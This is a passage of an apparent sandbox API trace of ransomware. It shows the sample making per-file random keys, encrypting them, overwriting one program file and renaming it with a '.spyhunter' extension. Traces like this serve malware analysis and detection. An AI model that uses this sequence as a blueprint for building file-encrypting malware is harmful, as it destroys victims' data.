0xffffffff [0113.200] GetProcessHeap () returned 0x2c0000 [0113.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.200] GetProcessHeap () returned 0x2c0000 [0113.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9c18 | out: hHeap=0x2c0000) returned 1 [0113.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa60 | out: pbBuffer=0x25cfa60) returned 1 [0113.200] GetProcessHeap () returned 0x2c0000 [0113.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.200] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa58*=0x30) returned 1 [0113.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.200] GetProcessHeap () returned 0x2c0000 [0113.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.200] GetProcessHeap () returned 0x2c0000 [0113.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c1f8 | out: hHeap=0x2c0000) returned 1 [0113.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa60 | out: pbBuffer=0x25cfa60) returned 1 [0113.200] GetProcessHeap () returned 0x2c0000 [0113.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.200] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa58*=0x30) returned 1 [0113.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.201] GetProcessHeap () returned 0x2c0000 [0113.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.201] GetProcessHeap () returned 0x2c0000 [0113.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9b00 | out: hHeap=0x2c0000) returned 1 [0113.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa58 | out: pbBuffer=0x25cfa58) returned 1 [0113.201] GetProcessHeap () returned 0x2c0000 [0113.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa50*=0x30) returned 1 [0113.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\ReachFramework.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\reachframework.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.201] GetProcessHeap () returned 0x2c0000 [0113.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.201] GetProcessHeap () returned 0x2c0000 [0113.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4778 | out: hHeap=0x2c0000) returned 1 [0113.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa58 | out: pbBuffer=0x25cfa58) returned 1 [0113.201] GetProcessHeap () returned 0x2c0000 [0113.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa50*=0x30) returned 1 [0113.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.royale.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.202] GetProcessHeap () returned 0x2c0000 [0113.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.202] GetProcessHeap () returned 0x2c0000 [0113.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de99e8 | out: hHeap=0x2c0000) returned 1 [0113.202] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa50 | out: pbBuffer=0x25cfa50) returned 1 [0113.202] GetProcessHeap () returned 0x2c0000 [0113.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.202] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa48*=0x30) returned 1 [0113.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.202] GetProcessHeap () returned 0x2c0000 [0113.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.202] GetProcessHeap () returned 0x2c0000 [0113.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de98d0 | out: hHeap=0x2c0000) returned 1 [0113.202] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa50 | out: pbBuffer=0x25cfa50) returned 1 [0113.202] GetProcessHeap () returned 0x2c0000 [0113.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.202] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa48*=0x30) returned 1 [0113.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.203] GetProcessHeap () returned 0x2c0000 [0113.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.203] GetProcessHeap () returned 0x2c0000 [0113.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9e50 | out: hHeap=0x2c0000) returned 1 [0113.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa48 | out: pbBuffer=0x25cfa48) returned 1 [0113.203] GetProcessHeap () returned 0x2c0000 [0113.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa40*=0x30) returned 1 [0113.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.204] GetProcessHeap () returned 0x2c0000 [0113.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.204] GetProcessHeap () returned 0x2c0000 [0113.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de97b8 | out: hHeap=0x2c0000) returned 1 [0113.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa48 | out: pbBuffer=0x25cfa48) returned 1 [0113.204] GetProcessHeap () returned 0x2c0000 [0113.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa40*=0x30) returned 1 [0113.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.204] GetProcessHeap () returned 0x2c0000 [0113.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.204] GetProcessHeap () returned 0x2c0000 [0113.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9588 | out: hHeap=0x2c0000) returned 1 [0113.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa40 | out: pbBuffer=0x25cfa40) returned 1 [0113.204] GetProcessHeap () returned 0x2c0000 [0113.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa38*=0x30) returned 1 [0113.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.205] GetProcessHeap () returned 0x2c0000 [0113.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.205] GetProcessHeap () returned 0x2c0000 [0113.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4680 | out: hHeap=0x2c0000) returned 1 [0113.205] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa40 | out: pbBuffer=0x25cfa40) returned 1 [0113.205] GetProcessHeap () returned 0x2c0000 [0113.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.205] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa38*=0x30) returned 1 [0113.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.205] GetProcessHeap () returned 0x2c0000 [0113.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.205] GetProcessHeap () returned 0x2c0000 [0113.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9c40 | out: hHeap=0x2c0000) returned 1 [0113.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa30 | out: pbBuffer=0x25cfa30) returned 1 [0113.208] GetProcessHeap () returned 0x2c0000 [0113.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa28*=0x30) returned 1 [0113.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\synchronization.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0113.223] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll") returned 97 [0113.223] StrStrW (lpFirst="Synchronization.rll", lpSrch=".txt") returned 0x0 [0113.223] GetProcessHeap () returned 0x2c0000 [0113.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0113.223] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf9ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf9ec*=0x2800, lpOverlapped=0x0) returned 1 [0113.308] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.308] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf9ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf9ec*=0x2800, lpOverlapped=0x0) returned 1 [0113.308] GetProcessHeap () returned 0x2c0000 [0113.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0113.309] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.309] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfa2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf9ec, lpOverlapped=0x0 | out: lpBuffer=0x25cfa2c*, lpNumberOfBytesWritten=0x25cf9ec*=0x4, lpOverlapped=0x0) returned 1 [0113.309] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf9ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf9ec*=0x30, lpOverlapped=0x0) returned 1 [0113.309] CloseHandle (hObject=0xf0) returned 1 [0113.309] GetProcessHeap () returned 0x2c0000 [0113.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0113.309] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll.spyhunter") returned 107 [0113.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\synchronization.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\resources\\1033\\Synchronization.rll.spyhunter" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\resources\\1033\\synchronization.rll.spyhunter")) returned 1 [0113.310] GetProcessHeap () returned 0x2c0000 [0113.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0113.310] GetProcessHeap () returned 0x2c0000 [0113.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.310] GetProcessHeap () returned 0x2c0000 [0113.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9470 | out: hHeap=0x2c0000) returned 1 [0113.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa30 | out: pbBuffer=0x25cfa30) returned 1 [0113.310] GetProcessHeap () returned 0x2c0000 [0113.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa28*=0x30) returned 1 [0113.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.347] GetProcessHeap () returned 0x2c0000 [0113.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.347] GetProcessHeap () returned 0x2c0000 [0113.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc31d0 | out: hHeap=0x2c0000) returned 1 [0113.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa28 | out: pbBuffer=0x25cfa28) returned 1 [0113.347] GetProcessHeap () returned 0x2c0000 [0113.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa20*=0x30) returned 1 [0113.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.361] GetProcessHeap () returned 0x2c0000 [0113.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.361] GetProcessHeap () returned 0x2c0000 [0113.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d02bc0 | out: hHeap=0x2c0000) returned 1 [0113.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa28 | out: pbBuffer=0x25cfa28) returned 1 [0113.361] GetProcessHeap () returned 0x2c0000 [0113.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cfa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cfa20*=0x30) returned 1 [0113.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.904] GetProcessHeap () returned 0x2c0000 [0113.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.904] GetProcessHeap () returned 0x2c0000 [0113.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc7470 | out: hHeap=0x2c0000) returned 1 [0113.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa20 | out: pbBuffer=0x25cfa20) returned 1 [0113.921] GetProcessHeap () returned 0x2c0000 [0113.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cfa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cfa18*=0x30) returned 1 [0113.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.938] GetProcessHeap () returned 0x2c0000 [0113.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.938] GetProcessHeap () returned 0x2c0000 [0113.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc3608 | out: hHeap=0x2c0000) returned 1 [0113.938] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa18 | out: pbBuffer=0x25cfa18) returned 1 [0113.939] GetProcessHeap () returned 0x2c0000 [0113.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.939] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cfa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cfa10*=0x30) returned 1 [0113.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.945] GetProcessHeap () returned 0x2c0000 [0113.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.945] GetProcessHeap () returned 0x2c0000 [0113.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc36e0 | out: hHeap=0x2c0000) returned 1 [0113.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa10 | out: pbBuffer=0x25cfa10) returned 1 [0113.973] GetProcessHeap () returned 0x2c0000 [0113.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cfa08*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cfa08*=0x30) returned 1 [0113.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.996] GetProcessHeap () returned 0x2c0000 [0113.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.996] GetProcessHeap () returned 0x2c0000 [0113.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cccd20 | out: hHeap=0x2c0000) returned 1 [0114.092] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa08 | out: pbBuffer=0x25cfa08) returned 1 [0114.092] GetProcessHeap () returned 0x2c0000 [0114.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.092] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cfa00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cfa00*=0x30) returned 1 [0114.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_few-showers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.098] GetProcessHeap () returned 0x2c0000 [0114.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.098] GetProcessHeap () returned 0x2c0000 [0114.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3ca00 | out: hHeap=0x2c0000) returned 1 [0114.098] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa00 | out: pbBuffer=0x25cfa00) returned 1 [0114.098] GetProcessHeap () returned 0x2c0000 [0114.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.098] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9f8*=0x30) returned 1 [0114.098] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_windy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 